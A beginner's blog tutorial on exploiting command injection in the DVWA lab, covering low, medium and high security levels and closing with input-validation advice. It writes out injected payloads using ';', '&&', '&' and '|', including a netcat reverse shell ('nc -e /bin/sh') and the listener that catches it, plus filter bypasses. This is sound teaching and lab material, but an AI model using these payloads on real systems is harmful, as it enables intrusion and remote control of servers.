Hacking for Beginners: Command Injection Vulnerability


command injection vulnerability

This post may contain affiliate links/ads and I may earn a small commission when you click on the links/ads at no additional cost to you. As an Amazon Affiliate, I earn from qualifying purchases. You can read my full disclaimer here.

Command Injection Vulnerability allows you to run arbitrary operating system commands in the target web server, so if the target web server uses Windows, you can run Windows OS commands, if it uses Linux, you will be able to run Linux commands.

Now, clearly this is a critical type of vulnerability as it allows a hacker to have full system control, access sensitive data, upload/download data, edit user security levels etc.

In this post, we are going to use command injection vulnerability to gain access to the target web server through a reverse shell and we will also be covering how to secure your web server against this type of attack?

Warning: This is for educational purpose only, I or TechSphinx shall not be held responsible for your illegal actions.

Pre-Requisites:

  • Kali Linux and Metasploitable (If you don’t know how to set up these, check out this post.)
  • Able to read and understand the above written “warning”.

Let’s Start

Start your Kali and Metasploitable Vm, and login to DVWA.

Now, Head over to command injection tab and enter the IP address to ping. (I am using the IP of my Kali machine i.e. 10.0.2.15)

You’ll see the output of the ping command.

command injection vulnerability

So, before starting to exploit the vulnerability, let’s try to understand what is going on in the background.

Whenever a user enters the IP address, the web server executes it using the command:

ping -c 4 10.0.2.15 

Open a Terminal in your Kali machine and try the same ping command in the terminal.

In Linux, if you have to run multiple commands in one line then we use a command separator (semicolon “;”)

Now, let’s try to exploit command injection vulnerability.

Low Difficulty:

1.) Navigate to DVWA security tab and change the security level to low.

2.) Now, type the IP and “pwd” command(to show present working directory) using the separator.

10.0.2.15 ; pwd
command injection vulnerability

3.) Now, let’s try to get a reverse shell. There are many ways to get a reverse shell but in this post, we are going to use “nc” (netcat).

First open a terminal and open a listener.

nc -vv -l -p 8080

nc : name of the tool we are using.
-vv : verbose, to show any output.
-l : to start listening
-p 8080 : port on which the program will listen.

Now, go to the DVWA command injection tab and enter the IP and the nc command using a separator.

10.0.2.15 ; nc -e /bin/sh 10.0.2.15 8080

nc: name of the program
-e /bin/sh: the file which we want to execute after a successful connection.
10.0.2.15: IP where our listener is running.
8080: port on which the listener is listening.

command injection vulnerability

Instead of a semi-colon (;) you can also use double ampersand (&&)

10.0.2.15 && nc -e /bin/sh 10.0.2.15 8080

4.) Once, we get the reverse shell, you can use any Linux command such as “ls”, “uname -a” etc.

We’ve successfully exploited the low difficulty, now let’s try for medium difficulty level.

Medium Difficulty:

1.) Change DVWA security to medium.

2.) Try the exploit we used in low difficulty (with both semi-colon and double ampersands), you’ll notice it’s not working anymore as the target is now more secure.

3.) So, now we can see the target is using filters to blacklist the semicolon and double ampersand, but what about a single ampersand? Let’s see if it is working.

10.0.2.15 & dir
command injection vulnerability

4.) You can see that the single ampersand is working, but there are other workarounds for this security level. We can also use pipe (“|” shift + backslash key) operator. Read more about pipe here.

command injection vulnerability

Now, as we exploited the medium difficulty let’s go for high difficulty.

High Difficulty:

1.) Change DVWA security to high.

2.) Try the exploit we used in medium difficulty, it’s not working anymore, right? Obviously, the target is more secure in high difficulty.

3.) Now, the target has blacklisted all the operators, but still, there is something that is working. Yes! The pipe operator without space is working. If you click on view source button below you’ll notice it. Let’s try to exploit it using

10.0.2.15|pwd
command injection vulnerability

You can type all the one-word commands like pwd, ls, dir, id, uname etc. but you cannot use the commands with an argument like uname -a, as there is a space between uname and -a, and the target is not accepting a space. So, that’s why we can’t use nc command for reverse shell in high security.

But, you can use all these one-word commands to gather info about the server and find some other vulnerabilities.

Impossible Difficulty:

This level of security is impossible to break as it contains all the security features one should implement to secure against a command injection vulnerability on their web server.

Secure Against Command injection vulnerability.

  1. Analyse the user’s input.
  2. Use filters and regex to exclude any unexpected results.

This is what they are doing in the impossible difficulty. For example: if the target web server is accepting the IPv4 (Like in DVWA) then analyse the input and make sure that the input only has 4 numbers separated by periods (“.”) i.e. “number.number.number.number” and use filters to exclude anything else. Have a look at the impossible difficulty source code.

command injection vulnerability

Now, you know how to exploit and secure command injection vulnerability. Go ahead and practice and share your opinions in the comment section.

If you like this post, then follow Techsphinx on Facebook and Twitter for more reviews, tricks, tips and tutorials.


Like it? Share with your friends!

Rahul R Nair

Rahul is obsessed with technology and programming. He is also the founder of TechSphinx. Being a technophile, he is always busy doing some techy stuff or learning about the latest technologies. When not busy with his usual routine (staring at the computer screen) he likes to write and share his knowledge with the world.
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x